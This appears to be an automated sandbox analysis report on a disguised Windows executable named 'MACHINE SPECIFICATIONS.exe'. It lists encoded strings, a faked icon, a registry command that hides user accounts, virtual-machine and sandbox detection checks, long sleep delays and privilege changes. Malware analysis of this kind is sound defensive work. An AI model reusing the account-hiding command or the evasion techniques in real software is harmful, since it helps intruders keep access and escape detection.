'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/u0039yZFJW1I.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/JKGBAy4L.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/Evy8ZFZv.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/u003945nHI75.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/DsC95IW8.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/sp1DLLAK.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/FuvtBB8E.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/u0039Bs7B26E.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/L1vs6o7t.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: MACHINE SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MACHINE SPECIFICATIONS.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: MACHINE SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\s\obj\Nerdbank.Streams\Release\net472\Nerdbank.Streams.pdb source: MACHINE SPECIFICATIONS.exe
Source:	Binary string: D:\a\1\s\obj\Nerdbank.Streams\Release\net472\Nerdbank.Streams.pdbSHA256c source: MACHINE SPECIFICATIONS.exe

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00167D07 push es; retf 0001h	0_2_00167E8C
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00167B6C push es; ret	0_2_00167B72
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00167E8F push es; retf 0001h	0_2_00167E8C
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7D528 pushfd ; retf	0_2_00F7D681
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7C5DB push eax; ret	0_2_00F7C5F1
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_00167D07 push es; retf 0001h	3_2_00167E8C
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_00167B6C push es; ret	3_2_00167B72
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_00167E8F push es; retf 0001h	3_2_00167E8C
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_05100ADD push 8B0876FFh; iretd	3_2_05100AE2
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_0510D919 push A4051F3Eh; retf	3_2_0510D925
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_0510D880 push edi; iretd	3_2_0510D886

Source: MACHINE SPECIFICATIONS.exe

Static PE information: 0x82522B87 [Thu Apr 14 19:46:15 2039 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.09295269868

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (67).png

Contains functionality to hide user accounts

Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49768

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.278268012.0000000002971000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 4532	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6368	Thread sleep time: -21213755684765971s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Window / User API: threadDelayed 3198			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Window / User API: threadDelayed 5893			Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: MACHINE SPECIFICATIONS.exe	Binary or memory string: Q2ljJWprY2t7ITWRsdk1xY2pLYWtlYmhifFZ4fmdxZ395fw==AJkJqYmprY2t7KUxiYHlrfXl/dT06Ow==9dG5tb1dxdG54Wm97bX9ve39jIyc=ITWRsdk1xY2pNcX55bW56XXV1UXt1e3hydA==9RXl2cWVmcicuW29vLE5mbn5/d38=ITWRsdk1xY2pNcX55bW56SGJ0d31XfXd5dnx2ARXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==ITWRsdk1xY2pNcX55bW56TXxkd1B8dHh5fXU=9RXl2cWVmcicuS2Z+aS1NZ3F/fHZ49dG5tb1dxdG54Wm97bX9ve39jIyU=1TWRsdk1xY2pKe2NsZHlgamNi)JkNwamNtcmltenklIiM=1TWRsdk1xY2pLZmR/fmx9ew==!JkJtbXB3Z3R8JyQl1TWRsdk1xY2pbaH5+fmx6Zn9/)JlJjd3F3Z3NhZmQlIiM=ATWRsdk1xY2pPaGdmbU5hfWJ0cWd9eng=9JkZjbmlkJkRne3hub3lnYH4/PD0=9dG5tb1dxdG54Wm97bX9ve39jJw==9TWRsdk1xY2pAWkZNZWF6amJ4fHQ=1JklRTyRDb2t8bHhiYmogIT4=9TWRsdk1xY2pAfG9GY2lnaXl0YA==1SHRnIyJIaWNhb2NufiMgIQ==)TWRsdk1xY2pNb2xub3l9
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MACHINE SPECIFICATIONS.exe	Binary or memory string: RXl2cWVmcicuW29vLE5mbn5/d38=
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: MACHINE SPECIFICATIONS.exe	Binary or memory string: RXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: MACHINE SPECIFICATIONS.exe	Binary or memory string: RXl2cWVmcicuS2Z+aS1NZ3F/fHZ4
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/uC4vLmC9.cs	Reference to suspicious API methods: ('nLrCoCGI', 'GetProcAddress@kernel32'), ('quWZDn18', 'LoadLibrary@kernel32')
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/uC4vLmC9.cs	Reference to suspicious API methods: ('nLrCoCGI', 'GetProcAddress@kernel32'), ('quWZDn18', 'LoadLibrary@kernel32')
Source: 0.0.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/uC4vLmC9.cs	Reference to suspicious API methods: ('nLrCoCGI', 'GetProcAddress@kernel32'), ('quWZDn18', 'LoadLibrary@kernel32')
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.12.unpack, EEuW4yL5/uC4vLmC9.cs	Reference to suspicious API methods: ('nLrCoCGI', 'GetProcAddress@kernel32'), ('quWZDn18', 'LoadLibrary@kernel32')
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 3.0.MACHINE SPECIFICATIONS.exe.100000.8.unpack, EEuW4yL5/uC4vLmC9.cs	Reference to suspicious API methods: ('nLrCoCGI', 'GetProcAddress@kernel32'), ('quWZDn18', 'LoadLibrary@kernel32')

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
